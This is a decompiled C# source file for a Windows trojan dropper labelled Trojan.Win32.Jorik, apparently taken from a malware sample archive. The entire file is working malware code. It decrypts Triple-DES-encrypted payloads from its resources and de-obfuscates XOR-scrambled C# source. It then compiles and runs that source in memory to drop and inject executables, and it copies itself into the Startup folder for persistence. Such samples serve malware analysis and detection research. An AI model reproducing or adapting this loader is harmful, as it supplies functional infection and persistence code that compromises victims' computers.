MalwareSourceCode/MSIL/Trojan/Win32/J/Trojan.Win32.Jorik.Llac.aki-6131c450a642a62ff8934573df43ef2a61b7fe73cdf48e5237cb51121cc94ce8/A.cs
2022-08-18 06:28:56 -05:00

203 lines
7.5 KiB
C#

// Decompiled with JetBrains decompiler
// Type: A
// Assembly: test5, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 5FEE5512-A04F-4880-B9BA-64F946A180EC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Jorik.Llac.aki-6131c450a642a62ff8934573df43ef2a61b7fe73cdf48e5237cb51121cc94ce8.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Security.Cryptography;
using System.Text;
using System.Windows.Forms;
public class A
{
private static string StrPath = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + Path.GetFileName(Application.ExecutablePath);
private static string[] Arry;
private static CompilerResults CRS;
private static CompilerParameters PR = new CompilerParameters();
private static CodeDomProvider CI;
[STAThread]
public static void Main()
{
ResourceManager resourceManager = new ResourceManager(nameof (A), Assembly.LoadFile(Application.ExecutablePath));
string input = Conversions.ToString(resourceManager.GetObject("Na"));
string key = Conversions.ToString(resourceManager.GetObject("K"));
string str1 = Encoding.Default.GetString(A.ENC(input, key));
int int32 = Convert.ToInt32(Conversions.ToString(1011100), 2);
char ch;
for (int CharCode = 0; CharCode <= int32; ++CharCode)
ch = Strings.Chr(CharCode);
string str2 = Interaction.Environ(A.Scram(Conversions.ToString(resourceManager.GetObject("X")))) + Conversions.ToString(ch) + str1 + ".exe";
try
{
byte[] numArray1 = A.ENC(Conversions.ToString(resourceManager.GetObject("Inj")), key);
A.LM("C", "T", A.Scram(Conversions.ToString(resourceManager.GetObject("L"))), new object[2]
{
(object) str2,
(object) numArray1
});
byte[] numArray2 = A.ENC(Conversions.ToString(resourceManager.GetObject("Z0")), key);
A.LM("IX", "AA", A.Scram(Conversions.ToString(resourceManager.GetObject("R"))), new object[2]
{
(object) numArray2,
(object) str2
});
int integer = Conversions.ToInteger(resourceManager.GetObject("i"));
if (integer != 1)
{
int num = integer - 1;
for (int index = 0; index <= num; ++index)
{
string Left = Interaction.Environ(A.Scram(Conversions.ToString(resourceManager.GetObject("X")))) + A.Scram(Conversions.ToString(resourceManager.GetObject("J")));
int CharCode = 70;
switch (index)
{
case 0:
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode)) + Conversions.ToString(Strings.Chr(CharCode)))));
break;
case 1:
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode + 13)) + Conversions.ToString(Strings.Chr(CharCode + 13)))));
break;
case 2:
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode + 14)) + Conversions.ToString(Strings.Chr(CharCode + 14)))));
break;
case 3:
Left = Conversions.ToString(Operators.ConcatenateObject((object) Left, resourceManager.GetObject(Conversions.ToString(Strings.Chr(CharCode + 15)) + Conversions.ToString(Strings.Chr(CharCode + 15)))));
break;
}
byte[] numArray3 = A.ENC(Conversions.ToString(resourceManager.GetObject("Z" + Conversions.ToString(index + 1))), key);
A.LM("C", "T", A.Scram(Conversions.ToString(resourceManager.GetObject("L"))), new object[2]
{
(object) Left,
(object) numArray3
});
A.LM("S", "SS", A.Scram(Conversions.ToString(resourceManager.GetObject("Y"))), new object[1]
{
(object) Left
});
}
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
A.SNPersistence();
}
public static string Reverser(string s)
{
s = s.Replace('#', 'e');
s = s.Replace(Strings.Chr(195), 'a');
s = s.Replace(Strings.Chr(200), 'i');
char[] charArray = s.ToCharArray();
Array.Reverse((Array) charArray);
return new string(charArray);
}
public static string EN_DES(string b, string c, bool d)
{
byte[] bytes;
if (d)
bytes = (byte[]) NewLateBinding.LateGet((object) new MD5CryptoServiceProvider(), (System.Type) null, "ComputeHash", new object[1]
{
(object) Encoding.UTF8.GetBytes(c)
}, (string[]) null, (System.Type[]) null, (bool[]) null);
else
bytes = Encoding.UTF8.GetBytes(c);
object Instance = (object) new TripleDESCryptoServiceProvider();
NewLateBinding.LateSet(Instance, (System.Type) null, "Key", new object[1]
{
(object) bytes
}, (string[]) null, (System.Type[]) null);
NewLateBinding.LateSet(Instance, (System.Type) null, "Mode", new object[1]
{
(object) CipherMode.ECB
}, (string[]) null, (System.Type[]) null);
NewLateBinding.LateSet(Instance, (System.Type) null, "Padding", new object[1]
{
(object) PaddingMode.PKCS7
}, (string[]) null, (System.Type[]) null);
return Encoding.UTF8.GetString(((ICryptoTransform) NewLateBinding.LateGet(Instance, (System.Type) null, "CreateDecryptor", new object[0], (string[]) null, (System.Type[]) null, (bool[]) null)).TransformFinalBlock(Convert.FromBase64String(b), 0, Convert.FromBase64String(b).Length));
}
public static byte[] ENC(string input, string key = null) => Encoding.Default.GetBytes(A.EN_DES(input, key, true));
public static void SNPersistence()
{
string str = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + Path.GetFileName(Application.ExecutablePath);
try
{
if (File.Exists(str))
return;
File.Copy(Application.ExecutablePath, str);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static string Scram(string I) => Encoding.Default.GetString(A.XQ(Encoding.Default.GetBytes(I), new byte[1]
{
(byte) 1
}));
public static byte[] XQ(byte[] E, byte[] P)
{
int length = P.Length;
int num = E.Length - 1;
for (int index = 0; index <= num; ++index)
E[index] = (byte) ((int) E[index] ^ (int) P[index % length]);
return E;
}
private static bool LM(string C, string V, string F, object[] P)
{
bool boolean;
try
{
A.Arry = new string[3]
{
"CSharp",
"System.dll",
"/platform:x86 /unsafe"
};
A.CI = CodeDomProvider.CreateProvider(A.Arry[0]);
A.Para();
A.CRS = A.CI.CompileAssemblyFromSource(A.PR, F);
System.Type type = A.CRS.CompiledAssembly.GetType(C);
if ((object) type != null)
{
MethodInfo method = type.GetMethod(V);
if ((object) method != null)
boolean = Conversions.ToBoolean(method.Invoke((object) null, P));
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
return boolean;
}
public static void Para()
{
A.PR.GenerateExecutable = false;
A.PR.GenerateInMemory = true;
A.PR.ReferencedAssemblies.Add(A.Arry[1]);
A.PR.CompilerOptions = A.Arry[2];
A.PR.TreatWarningsAsErrors = false;
}
}